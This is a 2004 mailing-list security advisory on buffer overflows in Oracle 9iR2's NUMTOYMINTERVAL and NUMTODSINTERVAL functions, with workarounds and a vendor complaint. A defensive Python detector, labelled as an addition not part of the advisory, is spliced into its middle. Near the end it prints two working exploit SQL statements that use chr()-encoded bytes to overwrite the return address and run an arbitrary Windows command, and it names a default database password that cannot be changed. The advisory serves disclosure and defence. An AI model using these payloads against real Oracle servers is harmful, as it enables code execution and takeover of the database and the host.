Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow

From: Cesar (cesarc56_at_UOL.COM.AR)
Date: 02/05/04

    Date:         Thu, 5 Feb 2004 17:20:15 -0300
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    Security Advisory

    Name: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow.
    System Affected : Oracle Database 9ir2, previous versions could be affected too.
    Severity : High
    Remote exploitable : Yes
    Author: Cesar Cerrudo.
    Date: 02/05/04
    Advisory Number: CC020401


    Legal Notice:

    This Advisory is Copyright (c) 2003 Cesar Cerrudo.
    You may distribute it unmodified and for free. You may NOT modify it and distribute it or distribute
    parts of it without the author's written permission. You may NOT use it for commercial intentions
    (this means include it in vulnerabilities databases, vulnerabilities scanners, any paid service,
    etc.) without the author's written permission. You are free to use Oracle details for commercial intentions.


    Disclaimer:

    The information in this advisory is believed to be true though it may be false.
    The opinions expressed in this advisory are my own and not of any company. The usual standard
    disclaimer applies, especially the fact that Cesar Cerrudo is not liable for any damages caused
    by direct or indirect use of the information or functionality provided by this advisory.
    Cesar Cerrudo bears no responsibility for content or misuse of this advisory or any derivatives thereof.



    !!!!!!!!!!!ALERT!!!!!!!!!!!:

    Oracle was contacted about these vulnerabilities, but their Security Response Team is one of the worst that
    I have dealt with; they don't care about security and they don't even follow OISafety rules (Oracle is a member).
    For this reason we have only told Oracle about a couple of bugs. I think I won't contact them anymore,
    or maybe if I get a letter from Larry Ellison asking for apologies... :).
    Anyway, if Oracle would spend more money on security than on marketing saying that their products are unbreakable,
    everything would be different. Right now Oracle database server and other Oracle products are some kind of backdoor.
    These vulnerabilities are just a few of the 60+ that we have identified (yes, more than 60 issues, and
    most of these issues can be exploited by any low privileged user to take complete control over the
    database and probably the OS; also, for some of them there aren't any workarounds). If you are running Oracle I
    recommend you start praying not to be hacked and start complaining to Oracle to improve the quality of
    their products and to release patches.

    BTW: if someone from Oracle dares to say that I'm not telling the truth, then I will probably release all the hole
    information to shut their mouths.

    Some workarounds to protect your Oracle servers until maybe next year, when Oracle could probably fix their buggy
    database server:

    -Check package permissions and remove permissions granted to PUBLIC; set the minimal permissions
    that fit your needs.
    -Check Directory Object permissions and remove permissions granted to PUBLIC; set the minimal permissions
    that fit your needs, and remove Directory Objects if not used.
    -Restrict users from executing PL/SQL statements directly on the server.
    -Periodically audit users' permissions on all database objects.
    -Lock users that aren't used.
    -Change default passwords.
    If you want automation, I really like AppDetective for Oracle:
    http://www.appsecinc.com/products/appdetective/oracle/


    Overview:

    Oracle Database Server is one of the most used database servers in the world. It was marketed
    as being unbreakable, and many people think it is one of the most secure database servers on
    the market. Larry Ellison (Oracle CEO) says that Oracle is used by the NSA, CIA, Russian intelligence, governments, etc.
    (www.commonwealthclub.org/archive/96/96-03ellison-qa.html), so it must be really secure!!!
    Oracle Database Server provides two functions, NUMTOYMINTERVAL and NUMTODSINTERVAL, that can be used from PL/SQL to
    convert numbers to date/time intervals; both of these functions have buffer overflow vulnerabilities.



    Details:

    When either of these conversion functions is called with a long string as its second
    parameter (the interval unit), a buffer overflow occurs.

    To reproduce the overflow, execute the following SQL:

    SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;

    SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;



    This vulnerability can be exploited by any Oracle Database user because access to these
    functions can't be restricted.
    Exploitation of this vulnerability allows an attacker to execute arbitrary code; it
    can also be exploited to cause a denial of service (DoS) by killing the Oracle server process. An attacker can
    completely compromise the OS and database if Oracle is running on the Windows platform, because Oracle must
    run under the Local System account or under an administrative account. If Oracle is running on *nix,
    then only the database could be compromised, because Oracle usually runs as the oracle user, which has restricted
    permissions.
    Important!: Exploitation of these vulnerabilities becomes easy if Oracle Internet Directory has
    been deployed, because Oracle Internet Directory creates a database user called ODSCOMMON that
    has the default password ODSCOMMON (Unbreakable???, hahaha, please take a look at this
    http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html). This password can not be changed,
    so any attacker can use this user to connect to the database and exploit these vulnerabilities.


    Full tests on Oracle Database 9ir2 under Microsoft Windows 2000 Server and Linux confirm these vulnerabilities;
    versions running on other OS platforms are believed to be affected too.
    Previous Oracle Database Server versions could be affected by these vulnerabilities as well.
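    As an added defender-side example (not part of the advisory and not Oracle's code): a small Python checker that scans SQL text, for instance statements captured in the database audit trail, for calls to the two functions and flags any call whose unit argument does not statically resolve to one of the documented unit names (YEAR/MONTH for NUMTOYMINTERVAL; DAY/HOUR/MINUTE/SECOND for NUMTODSINTERVAL). It resolves the `'literal' || chr(n)` concatenation form shown in the advisory; the unit names come from Oracle's documentation rather than from this page, and the sample statements are constructed.

```python
import re

# Documented valid unit names per function (Oracle compares them case-insensitively).
VALID_UNITS = {"NUMTOYMINTERVAL": {"YEAR", "MONTH"},
               "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"}}
CALL_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.IGNORECASE)
PIECE = r"'(?:[^']|'')*'|chr\s*\(\s*\d+\s*\)"                       # one literal or chr(n)
PIECE_RE = re.compile(r"'((?:[^']|'')*)'|chr\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
CONCAT_RE = re.compile(rf"\s*(?:{PIECE})(?:\s*\|\|\s*(?:{PIECE}))*\s*", re.IGNORECASE)

def _split_args(body):
    """Split the call body on top-level commas, stopping at the call's own ')'."""
    args, cur, depth, in_str = [], [], 0, False
    for c in body:
        if c == "'":
            in_str = not in_str                  # a doubled '' simply toggles twice
        elif not in_str and c in "()":
            depth += 1 if c == "(" else -1
            if depth < 0:                        # unbalanced ')' closes the call
                break
        elif not in_str and c == "," and depth == 0:
            args.append("".join(cur)); cur = []
            continue
        cur.append(c)
    return args + ["".join(cur)]

def resolve_literal(expr):
    """Evaluate 'lit' || chr(n) || ... statically; None if any part is not a literal."""
    if not CONCAT_RE.fullmatch(expr):
        return None
    return "".join(chr(int(n)) if n else s.replace("''", "'") for s, n in PIECE_RE.findall(expr))

def find_suspicious_calls(sql):
    """One (function, reason, resolved length) tuple per call with an unexpected unit argument."""
    findings = []
    for m in CALL_RE.finditer(sql):
        func, args = m.group(1).upper(), _split_args(sql[m.end():])
        unit = resolve_literal(args[1]) if len(args) > 1 else None
        if unit is None:                         # bind variable, column or nested function
            findings.append((func, "non-literal unit", 0))
        elif unit.upper() not in VALID_UNITS[func]:
            findings.append((func, "invalid unit literal", len(unit)))
    return findings

# Constructed sample statements: a legitimate call, an oversized literal, and a chr()-assembled literal.
SAMPLE_SQL = ["SELECT NUMTOYMINTERVAL(27, 'month') FROM dual",
              "SELECT NUMTODSINTERVAL(1, '" + "A" * 200 + "') FROM dual",
              "SELECT NUMTOYMINTERVAL(1, 'AAAAAAAAAA' || chr(66) || chr(1) || 'CCC') FROM dual"]
```

    Calls whose unit argument is a bind variable are reported separately, since the value must then be checked at runtime rather than from the statement text.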



    Exploits:

    --these exploits should work on W2K Server and WinXP, not tested on Win2003.
    --run any command at the end of the string
    SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
    chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt')
    FROM DUAL;

    SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
    chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(148)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt')
    FROM DUAL;



    Vendor Fix:

    Go to Oracle Metalink site, http://metalink.oracle.com


    Vendor Contact:

    Oracle was contacted, and they released a fix without telling me or the public anything and without issuing an alert.

